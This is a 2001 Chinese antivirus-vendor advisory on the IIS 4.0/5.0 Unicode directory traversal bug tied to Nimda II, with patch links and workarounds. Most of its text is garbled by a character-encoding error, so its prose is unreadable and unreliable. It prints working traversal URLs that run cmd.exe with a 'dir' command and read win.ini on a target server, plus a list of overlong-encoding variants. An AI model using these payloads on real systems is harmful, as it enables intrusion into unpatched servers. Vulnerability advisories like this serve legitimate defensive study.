¸öÈ˲úÆ·
ÆóÒµ²úÆ·
°²È«ÐÅÏ¢
²¡¶¾×¨À¸ | ©¶´×¨À¸ | ľÂíרÀ¸ | ·À»¤×¨À¸ | °²È«Òµ½ç | ¶¾°Ô»î¶¯ | ÈȵãרÌâ | Âþ»­°²È« | ÆÚ¿¯¶©ÔÄ
[an error occurred while processing this directive]
¸æËßÄúµÄλÖãºÊ×Ò³ > ×ÊѶÖÐÐÄ > ¶¾°Ô±¨µÀ > ÕýÎÄ
ÓëÄáÄ·´ï¢òÏà¹ØµÄIIS UNICODE BugÈ«Ãæ½âÎö
2001Äê10ÔÂ30ÈÕ23:21:04¡¡½ðɽ¶¾°ÔÕûÀí¡¡
[an error occurred while processing this directive]
¡¡¡¡Ò»£®´æÔڵĩ¶´

¡¡¡¡1. ΢ÈíIIS 4.0 / 5.0 ´æÔÚÀ©Õ¹UNICODEĿ¼±éÀú©¶´£¬¸Ã©¶´¼ÈÊÇÒ»Ô¶³Ì©¶´£¬Í¬Ê±Ò²ÊÇÒ»±¾µØÂ©¶´¡£

¡¡¡¡ÊÜÓ°ÏìµÄ°æ±¾£º

¡¡¡¡Microsoft IIS 5.0

¡¡¡¡+ Microsoft Windows NT 2000

¡¡¡¡Microsoft IIS 4.0

¡¡¡¡+ Microsoft Windows NT 4.0

¡¡¡¡+ Microsoft BackOffice 4.5

¡¡¡¡- Microsoft Windows NT 4.0

¡¡¡¡+ Microsoft BackOffice 4.0

¡¡¡¡- Microsoft Windows NT 4.0

¡¡¡¡²»ÊÜÓ°ÏìµÄ°æ±¾£º

¡¡¡¡Â©¶´ÃèÊö£º

¡¡¡¡Î¢ÈíIIS 4.0ºÍ5.0¶¼´æÔÚÀûÓÃÀ©Õ¹UNICODE×Ö·ûÈ¡´ú"/"ºÍ"£Ü"¶øÄÜÀûÓÃ"../"

¡¡¡¡Ä¿Â¼±éÀúµÄ©¶´¡£

¡¡¡¡Î´¾­ÊÚȨµÄÓû§¿ÉÄÜÀûÓÃIUSR_machinenameÕ˺ŵÄÉÏÏÂÎĿռä·ÃÎÊÈκÎÒÑÖª

¡¡¡¡µÄÎļþ¡£¸ÃÕ˺ÅÔÚĬÈÏÇé¿öÏÂÊôÓÚEveryone ºÍUsers×éµÄ³ÉÔ±£¬Òò´ËÈκÎÓë

¡¡¡¡Web¸ùĿ¼ÔÚͬһÂß¼­Çý¶¯Æ÷ÉϵÄÄܱ»ÕâЩÓû§×é·ÃÎʵÄÎļþ¶¼Äܱ»É¾³ý£¬

¡¡¡¡Ð޸ĻòÖ´ÐУ¬¾ÍÈçͬһ¸öÓû§³É¹¦µÇ½ËùÄÜÍê³ÉµÄÒ»Ñù¡£

¡¡¡¡²âÊÔ·½·¨£º

¡¡¡¡http://target.computer/scripts/..%c1%1c../path/solo.txt

¡¡¡¡%c0%af = /

¡¡¡¡%c1%9c = ½â¾ö·½°¸:

¡¡¡¡¸Ã©¶´²¹¶¡ËæÎ¢Èí°²È«¹«¸æMS00-057Ò»Æð·¢²¼

¡¡¡¡microsoft.com/technet/security/bulletin/ms00-057.asp

¡¡¡¡¿ÉÒÔ´ÓÈçϵØÖ·ÏÂÔØ²¹¶¡:

¡¡¡¡IIS 4.0

¡¡¡¡microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

¡¡¡¡IIS 5.0

¡¡¡¡microsoft.com/windows2000/downloads/critical/q269862/default.asp

¡¡¡¡2£®IIS 4.0/5.0 unicode½âÂë©¶´µ¼ÖÂÎļþй©»òÖ´ÐÐ

¡¡¡¡IIS 4.0ºÍIIS 5.0ÔÚUnicode×Ö·û½âÂëµÄʵÏÖÖдæÔÚÒ»¸ö°²È«Â©¶´£¬µ¼ÖÂÓû§¿ÉÒÔÔ¶³Ìͨ¹ýIISÖ´ÐÐÈÎÒâÃüÁî¡£µ±IIS´ò¿ªÎļþʱ£¬Èç¹û¸ÃÎļþÃû°üº¬unicode×Ö·û£¬Ëü»á¶ÔÆä½øÐнâÂ룬Èç¹ûÓû§Ìá¹©Ò»Ð©ÌØÊâµÄ±àÂ룬½«µ¼ÖÂIIS´íÎóµÄ´ò¿ª»òÕßÖ´ÐÐijЩweb¸ùĿ¼ÒÔÍâµÄÎļþ¡£

¡¡¡¡¶ÔÓÚIIS 5.0/4.0ÖÐÎİ棬µ±IISÊÕµ½µÄURLÇëÇóµÄÎļþÃûÖаüº¬Ò»¸öÌØÊâµÄ±àÂëÀýÈç"%c1%hh"

¡¡¡¡»òÕß"%c0%hh",Ëü»áÊ×ÏȽ«Æä½âÂë±ä³É:0xc10xhh£¬ È»ºó³¢ÊÔ´ò¿ªÕâ¸öÎļþ£¬Windows ϵͳ

¡¡¡¡ÈÏΪ0xc10xhh¿ÉÄÜÊÇunicode±àÂ룬Òò´ËËü»áÊ×ÏȽ«Æä½âÂ룬Èç¹û 0x00<= %hh < 0x40µÄ»°£¬

¡¡¡¡²ÉÓÃµÄ ½âÂëµÄ¸ñʽÓëÏÂÃæµÄ¸ñʽÀàËÆ£º

¡¡¡¡%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh

¡¡¡¡%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh

¡¡¡¡[iduba_page]

¡¡¡¡Òò´Ë£¬ÀûÓÃÕâÖÖ±àÂ룬ÎÒÃÇ¿ÉÒÔ¹¹ÔìºÜ¶à×Ö·û£¬ÀýÈç:

¡¡¡¡%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ¡¯/¡¯

¡¡¡¡N %c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ¡¯¡¯

¡¡¡¡¹¥»÷Õß¿ÉÒÔÀûÓÃÕâ¸ö©¶´À´ÈƹýIISµÄ·¾¶¼ì²é£¬È¥Ö´ÐлòÕß´ò¿ªÈÎÒâµÄÎļþ¡£

¡¡¡¡(1) Èç¹ûϵͳ°üº¬Ä³¸ö¿ÉÖ´ÐÐĿ¼£¬¾Í¿ÉÄÜÖ´ÐÐÈÎÒâϵͳÃüÁî¡£ÏÂÃæµÄURL¿ÉÄÜ

¡¡¡¡Áгöµ±Ç°Ä¿Â¼µÄÄÚÈÝ£º

¡¡¡¡http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

¡¡¡¡(2) ÀûÓÃÕâ¸ö©¶´²é¿´ÏµÍ³ÎļþÄÚÈÝÒ²ÊÇ¿ÉÄܵģº

¡¡¡¡http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

¡¡¡¡Rain Forest Puppy <rfp@WIRETRIP.NET>²âÊÔ·¢ÏÖ¶ÔÓÚÓ¢ÎİæµÄIIS 4.0/5.0,´ËÎÊÌâͬÑù

¡¡¡¡´æÔÚ£¬Ö»ÊDZàÂë¸ñʽÂÔÓв»Í¬£¬±ä³É"%c0%af"»òÕß"%c1%9c".

¡¡¡¡2. ÁÙʱ½â¾ö·½·¨£º

¡¡¡¡1¡¢Èç¹û²»ÐèÒª¿ÉÖ´ÐеÄCGI£¬¿ÉÒÔɾ³ý¿ÉÖ´ÐÐÐéÄâĿ¼,ÀýÈç /scriptsµÈµÈ¡£

¡¡¡¡2¡¢Èç¹ûȷʵÐèÒª¿ÉÖ´ÐеÄÐéÄâĿ¼£¬½¨Òé¿ÉÖ´ÐÐÐéÄâĿ¼µ¥¶ÀÔÚÒ»¸ö·ÖÇø

¡¡¡¡³§É̲¹¶¡£º

¡¡¡¡Î¢ÈíÒѾ­·¢²¼ÁËÒ»¸ö°²È«¹«¸æMS00-78£¬Äú¿ÉÒÔÔÚÏÂÁеØÖ·¿´µ½¸üÏêϸµÄÄÚÈÝ£º

¡¡¡¡http://www.microsoft.com/technet/Security/Bulletin/ms00-078.asp

¡¡¡¡²¹¶¡¿ÉÒÔ´ÓÏÂÁеØÖ·ÏÂÔØ£º

¡¡¡¡Microsoft IIS 4.0:

¡¡¡¡microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

¡¡¡¡Microsoft IIS 5.0:

¡¡¡¡microsoft.com/windows2000/downloads/critical/q269862/default.asp

¡¡¡¡¶þ£®UNICODE©¶´µÄÔ­Àí

¡¡¡¡ÉÏÊö©¶´Ò»´ÓÖÐÎÄIIS4.0+SP6¿ªÊ¼£¬»¹Ó°ÏìÖÐÎÄWIN2000+IIS5.0¡¢ÖÐÎÄWIN2000+IIS5.0+SP1£¬Ì¨Íå·±ÌåÖÐÎÄҲͬÑù´æÔÚÕâÑùµÄ©¶´¡£

¡¡¡¡ÖÐÎİæµÄWIN2000ÖУ¬UNICODE±àÂë ´æÔÚBUG£¬ÔÚUNICODE ±àÂëÖÐ

¡¡¡¡%c1%1c -¡µ (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ¡¯/¡¯

¡¡¡¡%c0%2f -¡µ (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ¡¯£Ü¡¯

¡¡¡¡ÔÚNT4ÖÐ/±àÂëΪ%c1%9c

¡¡¡¡ÔÚÓ¢ÎİæÀWIN2000Ó¢Îİæ%c0%af

¡¡¡¡µ«´Ó¹úÍâijЩվµãµÃÀ´µÄ×ÊÁÏÏÔʾ£¬»¹ÓÐÒÔϵıàÂë¿ÉÒÔʵÏֶԸé¶´µÄ¼ì²â£¬ %c1%pc

¡¡¡¡%c0%9v

¡¡¡¡%c0%qf

¡¡¡¡%c1%8s

¡¡¡¡%e0%80%af

¡¡¡¡%f0%80%80%af

¡¡¡¡%fc%80%80%80%80%af

¡¡¡¡[iduba_page]

¡¡¡¡Èý¡£UNICODE©¶´µÄ¼ì²â

¡¡¡¡ÒÔϾùÒÔÖÐÎİæWIN2KΪÀý£¬Èç¹ûÊÇÆäËûNT°æ±¾£¬°´ÉÏÃæËùÊöµÄ±àÂëÌæ»»ÒÔÏ´úÂëÖеÄ%c1%1c×î¼òµ¥µÄ¼ì²â·½·¨£º

¡¡¡¡±ÈÈç˵ÓÐÒ»IPµØÖ·ÎªX.X.X.XµÄWIN2KÖ÷»ú£¬ÎÒÃÇ¿ÉÒÔÔÚµØÖ·À¸ÊäÈëx.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dirÈç¹û´æÔÚ´Ë©¶´µÄ»°£¬ÎÒÃDZã¿ÉÒÔ¿´µ½ÒÔϵÄÄÚÈÝ£º£¨Àý×Ó¼ÙÉèSCRIPTSĿ¼ÀïÎÞÎļþ£©

¡¡¡¡Directory of C:£Üinetpub£Üscripts

¡¡¡¡2000-09-28 15:49 ¡´DIR¡µ .

¡¡¡¡2000-09-28 15:49 ¡´DIR¡µ ..

¡¡¡¡Êµ¼ÊÉÏÒ²¿ÉÒÔ¸ÄΪÕâÑù127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/r+dir¼´r=c Õâ¸ö×ÖĸµÄÈ¡´ú£¬¹ØÓÚrÕâ×Öĸ¿ÉÒÔµÈЧÓÚc,ÎÒÃÇ¿
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]     ¡¾¡¿
¡¾ÎÒÒª·¢±íÆÀÂÛ¡¿¡¾ÄÚÈÝÖ¸Õý¡¿¡¾ÂÛ̳¡¿¡¾ÍƼö¸øºÃÓÑ¡¿¡¤¡¾´ó ÖРС¡¿¡¾´òÓ¡¡¿¡¤¡¾¶¥²¿¡¿¡¾¹Ø±Õ´°¿Ú¡¿
¡¾Ïà¹ØÎÄÕ¡¿ ¡¾È¥ÂÛ̳¡¿
¡¤ ΢Èí²Ù×÷ϵͳ©¶´¶à¡¡ÓÃWindowsµÄATMÓöΣ»ú 2003-12-09 16:02
¡¤ ϵͳ©¶´·ÖÎö:DoS¾Ü¾ø·þÎñ¹¥»÷À´Ï®ÈçºÎÓ¦¶Ô 2003-10-11 11:15
¡¤ ±¨¸æÈÏΪ 64%µÄ²¡¶¾¹¥»÷½üÆÚ·¢ÏÖµÄϵͳ©¶´ 2003-10-03 22:17
¡¤ ϵͳ©¶´²ã³ö²»Çî¡¡½ÌÄã¼ì²âä¯ÀÀÆ÷ÊÇ·ñ°²È« 2003-09-27 15:48
¡¤ ¡°°¢Ü½Âס±²¡¶¾³ÑÍþ¡¡ÏµÍ³Â©¶´ÐÞ¸´ÆÈÔÚü½Þ 2003-01-14 14:32
¡¤ ÈçºÎ¼ì²â©¶´£¿¼òÊö¼ì²éϵͳ©¶´µÄ³£¼û·½·¨ 2002-10-24 14:12
¡¤ ±È²¡¶¾¸ü¶¾ ϵͳ©¶´½«³ÉµçÄÔ°²È«Í·ºÅΣв 2002-09-29 16:22
¡¤ ϵͳ©¶´°Ù³ö Ó¢Ê×ÏฮÏòºÚ¿Í¡°´ó¿ªºóÃÅ¡± 2002-08-20 09:08
¡¤ ÃÀCERTͳ¼ÆÏÔʾ£ºÏµÍ³Â©¶´³Ê¼«¾çÉÏÉýÇ÷ÊÆ 2002-07-16 13:00
¡¤ Ó°ÏìʹÓÃUnix·þÎñÆ÷µÄÓòÃûϵͳ©¶´ºÜÄÑÐÞ¸´ 2002-07-07 15:58
¡¤½ðɽ¶¾°Ôµ¥»ú°æÌÖÂÛÇø
¡¤¶¾°Ô6²âÊÔ×¨Çø
¡¤½ðÉ½ÍøïÚÌÖÂÛÇø
¡¤½ðɽ¶¾°ÔÍøÂç°æÌÖÂÛÇø
¡¤¶¾°ÔÔÚÏßÒµÎñרÌâÌÖÂÛÇø
¡¤°²È«Èí¼þÌÖÂÛÇø
¡¤²¡¶¾¾ÈÔ®
¡¾Ïà¹Ø×¨Ìâ¡¿
¡¤ ÄáÄ·´ï¢ò(nimda.E)²¡¶¾×¨Ìâ 2001-10-30 09:46
¡¤ ÇóÖ°ÐÅ£¨WANTJOB£©²¡¶¾×¨Ìâ 2001-10-27 06:21
¡¤ ÄáÄ·´ï(¸ÅÄî)²¡¶¾×¨Ìâ 2001-09-19 08:02
[an error occurred while processing this directive]
[an error occurred while processing this directive]
¡¤È«ÃñΧ½Ë Ð´ºÎÞ¶¾ 
¡¤
¶¾°Ô¡¢ÍøïÚй¦ÄÜÌåÑé°æ 
¡¤
¶¾°ÔÍøÂç°æ2.0 sp1·¢²¼ 
¡¤
¶¾°Ô6ÐÂìûÀñ°ü¾ªÏ²µÇ³¡
¡¤
¶¾°ÔÍøÂç°æ ÈËÈËÓÐÀñ
¡¤¶¾°ÔÍøÂç°æ¡°×âÓ÷þÎñ¡±
¡¤
½ðɽ¶¾°ÔÍøÂç°æ´óʼþ
¡¤µÚÈý´Î¼©¶¾ÍòÀïÐÐרÌâ
¡¤JPEGͼƬ²¡¶¾×¨Ìâ
¡¤½ðɽÒý±¬¡°Ë«ÏìÅÚ¡±¼Æ»®
¡¤½ðɽ¶¾°Ô6ÔöÇ¿°æ½éÉÜ
¡¤
Ê®ÃæÂñ·üΧ½ËľÂí·¢²¼»á
¡¤
6.12±±¾©Óû§²úÆ·×ù̸»á
¡¤
½ðɽ"ÍøÓηÀ»ðǽ"²úÆ·
¡¤
·´µç×ÓÀ¬»øÐ¹¦ÂÔרÌâ
¡¤¡°½ðɽ¶¾°ÔÔÙ»ñ¹ð¹Ú¡±
¡¤½ðɽ¡°°²È«ÌåÑé·ç±©¡±
¡¤¡°³å»÷²¨¡±²¡¶¾Ö®×
¡¤È«ÇòºÚ¿Í¹¥»÷רÌâ
¡¤½ðɽ¶¾°ÔV½ðÉ½ÍøïÚV½éÉÜ
¡¤½ðɽV¹¥ÂÔÏê½âרÌâ
¡¤½ðɽ¶¾°Ô&ÖǹÚÀ¦°óÏúÊÛ
¡¤½ðɽÈí¼þ°®ÐÄ·þÎñ»î¶¯
¡¤2003Ä겡¶¾ÒßÇéµ÷²éרÌâ
¸ü¶à...
[an error occurred while processing this directive]
¡¤²¡¶¾¶ÌÐÅ¡¡¡¤ÔÚÏßɱ¶¾
¡¤²¡¶¾Éϱ¨¡¡¡¤×¨É±¹¤¾ß
¡¤²úÆ·´ðÒÉ¡¡¡¤
ýÌåºÏ×÷
½ðɽ¼ò½é | ÒµÎñºÏ×÷ | ¹ã¸æ·þÎñ | ÕÐÆ¸ÐÅÏ¢ | ¿Í·þÖÐÐÄ | ÍøÒ³±¨´í | Ìí¼Ó¶¾°Ôµ½QQÉÏ
© 2007 Kingsoft Corp. ÔöÖµµçÐÅÒµÎñ¾­ÓªÐí¿ÉÖ¤B2-20040288ºÅ